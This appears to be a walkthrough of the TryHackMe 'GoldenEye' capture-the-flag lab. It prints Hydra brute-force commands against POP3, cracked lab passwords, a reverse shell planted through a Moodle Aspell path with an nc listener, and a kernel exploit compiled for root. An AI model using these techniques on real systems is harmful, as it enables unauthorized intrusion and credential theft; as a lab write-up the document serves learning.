Guided:
Q: Use nmap to scan the network for all ports. How many ports are open?
A: 4
(used nmap -p- , but didn't count the filtered ones)
Q: Who needs to make sure they update their default password? A: Boris
Opened Web-site on port 80, used
Ctrl+Uand saw a link to "terminal.js", The link reveals HTML enteties encode for user Boris default password.InvincibleHack3r
Q: Whats their password?
A: InvincibleHack3r
By decoding it online Here
Q: If those creds don't seem to work, can you use another program to find other users and passwords? Maybe Hydra?Whats their new password?
A: secret1!
Used Telnet to connect to pop3 on port 55007,
boris:InvincibleHack3rdidn't work, but at least I've got the username right, time for bruteforce.
hydra -l boris -P /usr/share/wordlists/fasttrack.txt <IP> pop3 -s 55007 -t 50
Q: Inspect port 55007, what services is configured to use this port?
A: Telnet
Q: What can you find on this service?
A: emails
Q: What user can break Boris' codes?
A: Natalya
Mentioned at web-site source and emails
hydra -l natalya -P /usr/share/wordlists/fasttrack.txt <IP> pop3 -s 55007 -t 50
Reveals
natalya:bird
natalya's email reveals this:
username: xenia
password: RCP90rulez!
And if you didn't have the URL on outr internal Domain: severnaya-station.com/gnocertdir
Q: Try using the credentials you found earlier. Which user can you login as?
A: xenia
Q: Have a poke around the site. What other user can you find?
A: doak
Going to
http://severnaya-station.com/gnocertdirwith xenia's creds,
Go toMy profile->Messagesreveals msg from Dr_doak
My email username is... doak
Q: What was this users password?
A: goat
hydra -l doak -P /usr/share/wordlists/fasttrack.txt <IP> pop3 -s 55007 -t 50
Q: What is the next user you can find from doak?
A: dr_doak
Reveals in he's email.
Q: What is this users password?
A: 4England!
Login as user doak, go to
My profile->My private files->for jamesand download the file "s3cret.txt"
S3cret.txt reveals/dir007key/for-007.jpg, so i went to the full link ->http://severnaya-station.com/dir007key/for-007.jpg-> Download the .img and pass it on to extract meta-data Here
Exifdata reveals base64 hidden messageeFdpbnRlcjE5OTV4IQ==
echo eFdpbnRlcjE5OTV4IQ== | base64 -d->xWinter1995x!
It was web-site's admin password,admin:xWinter1995x!
Login as admin and THM hinted to look for "Aspell" plugin.
There was a search bar on the bottom-left side, searched for 'spell' and found "Spell engine" that should of be changed from 'Google Spell' to 'PSpellShell', and 'Path to aspell' changed to my reverse shell, (THM hinted it should be python one)
Pentestmonkey shells (python one)
Opened nc listener and got connection back as userwww-data
THM suggested to download and transfer linuxprivchecker
Honestly they just wanted me to useuname -a
Q: Whats the kernel version?
A: 3.13.0-32-generic
THM said to use this Exploit
But the target machine didn't have "gcc" to compile it, but it had "cc" , All i had to do to tweak it correctly is to open the exploit and change fromgcc->cc
Upload to target, compile the exploit, use exploit... and...
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
>Get root's flag and open the last link in it -> http://severnaya-station.com/006-final/xvf7-flag/